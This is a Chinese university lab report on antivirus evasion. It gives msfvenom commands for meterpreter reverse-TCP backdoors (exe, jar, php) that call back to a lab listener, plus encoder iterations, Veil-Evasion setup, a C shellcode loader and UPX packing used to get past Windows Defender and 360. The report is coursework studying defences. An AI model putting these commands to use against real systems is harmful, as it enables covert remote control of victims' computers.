2018-2019-2 网络对抗技术 20165231 Exp3 免杀原理与实践
实践内容(3.5分)
1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)
1.2 通过组合应用各种技术实现恶意代码免杀(0.5分)
(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)
1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5)
2.
基础问题回答
(1)杀软是如何检测出恶意代码的?
检测特征码、启发式恶意软件检查和行为。
(2)免杀是做什么?
通过一些手段伪装使恶意代码免遭杀软查杀。
(3)免杀的基本方法有哪些?
有msfvenom编码、使用veil-evasion等重写恶意代码、利用shellcode生成可执行文件、加壳等方法或者更高级的特征码修改包括文件特征码修改和内存特征码修改。
实验过程
任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;
1、使用msf编码器
使用命令生成后门程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.70.131 LPORT=5231 -f exe > wyhy.exe

将生成的程序上传到virus total检测

上传virscan检测

使用msf编码器对后门程序编码10次
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.70.131 LPORT=5231 -f exe > wyhy-10.exe

然后再传到virus total上检测

上传virscan检测

2、使用msfvenom生成jar
使用命令生成.jar包
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.70.131 lport=5231 x> 5231_backdoor.jar
上传virscan检测

3、使用msfvenom生成php
使用命令生成php文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.131 LPORT=5231 x> 5231_backdoor.php
上传virscan检测

(居然只有一个检测出来了,是谁呢?)

(卡巴斯基,牛皮!乌拉!!!(破音!))
4、使用veil-evasion
安装这个veil真的是,遇到提示别选Y手动安装,直接s(silent)静默安装,系统决定,一切随缘,手动安装的下场就是这样( ⬜ ⬜ ⬜? ⬜ ⬜。 ⬜ ⬜ ⬜!)

如果安装失败的,可以去usr/share/veil/config 下运行setup.sh 重新安装

最后安装成功的输入veil会有如下界面,然后输入use evasion进入evil-evasion输入命令use c/meterpreter/rev_tcp.py进入配置界面

set LHOST 192.168.70.131
set LPORT 5231
options
输入generate生成文件,接着输入你想要playload的名字

然后文件保存在/var/lib/veil/output/compiled/下,将生成文件提交扫描


任务二:Linux平台交叉编译Windows应用
5、利用shellcode编程
先执行shellcode生成命令得到shellcode

然后创建个.c文件将shellcode代码注入
“shellcode”
int main()
{
int (func)() = (int()())buf;
func();
}
执行i686-w64-mingw32-g++ 20165231.c -o 20165231.exe生成可执行的后门程序
然后上传测一下

然后拖到主机上测试,被检测出禁止运行并且Windows defender自动清理掉了(我的电脑早在三年前就卸载了360,电脑管家之类的,三年来的苟活凭借的就是一身正气加上微软自带的Windows Defender,我觉得那些东西不会让我电脑比这个更安全只会让它更卡!!!)


6.加壳测试
使用c+shellcode+加压缩壳
实验环境:被控机是win10实体机,没有360和腾讯电脑管家,微软自带Windows defender防火墙杀毒全开。
原理:将shellcode替换到以上代码的数组后给编译生成的EXE文件加壳中达到免杀效果
使用压缩壳(UPX)upx 20165231.exe -o wyhy5231.exe然后放到主机测试
放着不动或者用杀毒工具扫描就没有报警,一旦运行直接警告,并且直接被删


好的我错了,我以为就这么通过了没几分钟它就不见了!!!???系统又悄悄启动扫描一遍然后偷偷把文件给删了,然后再次放进主机共享文件夹就有危险报警了

为了完成反弹回连给他白名单吧,但是………………

好吧只有整个文件夹给设置为白名单吧(其实并没啥用,还是会被删,然后去威胁详细表里面手动恢复)
最后按照上次实验的步骤,我还是控制了我的win10主机,并且拍了个照,Windows defender也没有再干预。


任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
免杀方法:先用msfvenom生成shellcode,再使用压缩壳进行加壳。
实验环境:对方电脑为 win7实体机,360 11.5.0.2002
本机打开msf控制台,开始监听,受控机运行后门程序


开启杀软能绝对防止电脑中恶意代码吗?
不能,此次简单的实验都逃过一劫(虽然有些地方暂时启用了白名单),高手总会想办法模拟一些正常软件的特征然后不断加壳加密或者更加高级的手段逃过杀软的查杀。
实验中遇到的问题
1、安装veil-evasion过程中出现很多弹窗提示你安装,但是里面的字却又是方框,编码错误显示不出来。
解决:在安装之除就选择s静默安装,一切由系统自己设置安排。
2、虚拟机ping不通别的实体机
解决:把虚拟机网卡设置改为桥接模式就可以了
实验感想
本次实验很长,很不好做,特别是veil,安装时间长,出错排查困难。经过这次实验我也认识到杀软也不是万能的,总会有病毒库里没出现过的新鲜玩意逃过一劫。想要电脑的安全就要做到自己不主动浏览不安全网站,不去下载不明软件,再加上杀软的一些防火墙功能,对于我们普通人来说还是很安全的。其次身边同学的实验也让我感受到360 和安全管家真是越来越** 了,好好一台电脑装了这玩意儿就卡卡卡死了!
2018-2019-2 网络对抗技术 20165231 Exp3 免杀原理与实践的更多相关文章
- 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践
2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...
- 2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...
- 2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...
- 2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践 免杀原理及基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. ...
- 2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践 一.实践目标 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳 ...
- 2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 主要依托三种恶意软件检测机制. 基于特征码的检测:一段特征码就是一段或者多 ...
- 2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践 实验内容(概要) 一.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...
- 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践 - 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...
- 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践
2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...
随机推荐
- 使用Builder模式创建复杂可选参数对象
在新建对象时,若需要对大量可选参数进行赋值,最常见的做法是JavaBeans模式,即调用一个无参构造方法创建对象,然后调用setter方法来设置每个必要的参数,以及每个相关的可选参数.代码示例如下: ...
- jeecg入门操作—树型表单开发
树表类型表单 表单创建,基础配置如下: 1.设置表单类型为:单表; 2.是否树选择:是; 3.设置特殊字段:[树形表单父id][树开表单列] 结果测试
- C# 查看EF生成的SQL语句
用sqlsever追踪最后的sql语句. 返回IQueryable<T>类型, 里面封装的就是生成的SQL脚本,设置断点queryable = DataContext.Set<T&g ...
- 【问题解决方案】AttributeError: module 'pygal' has no attribute 'Worldmap'
<Python编程:从入门到实践>- 16章-16.2.5制作世界地图 import pygal 后报如标题的error 参考CSDN 解决:AttributeError: module ...
- JS 输入框输入数字检查
<input id='ApplyInputNum' type='text' class='mytext form-control' align='left' onblur='InputCheck ...
- 【集训队作业2018】取名字太难了 任意模数FFT
题目大意 求多项式 \(\prod_{i=1}^n(x+i)\) 的系数在模 \(p\) 意义下的分布,对 \(998244353\) 取模. \(p\) 为质数. \(n\leq {10}^{18} ...
- PAT 甲级真题题解(63-120)
2019/4/3 1063 Set Similarity n个序列分别先放进集合里去重.在询问的时候,遍历A集合中每个数,判断下该数在B集合中是否存在,统计存在个数(分子),分母就是两个集合大小减去分 ...
- 20165223《信息安全系统设计基础》第九周学习总结 & 第八周课上测试
目录 [第九周学习总结] 教材内容总结 [第八周课上测试] (一)求命令行传入整数参数的和 (二)练习Y86-64模拟器汇编 (三)基于socket实现daytime(13)服务器和客户端 参考资料 ...
- 浅析redis缓存 在spring中的配置 及其简单的使用
一:如果你需要在你的本地项目中配置redis.那么你首先得需要在你的本地安装redis 参考链接[http://www.runoob.com/redis/redis-install.html] 下载r ...
- 【优秀的iPhone/iPad数据恢复工具】Omni Recover for Mac 2.5
[简介] 今天和大家分享最新的 Omni Recover for Mac 2.5 版本,这是一款Mac上优秀的iPhone/iPad设备数据恢复工具,支持恢复误删除的短信.照片.视频.文档.通话记录等 ...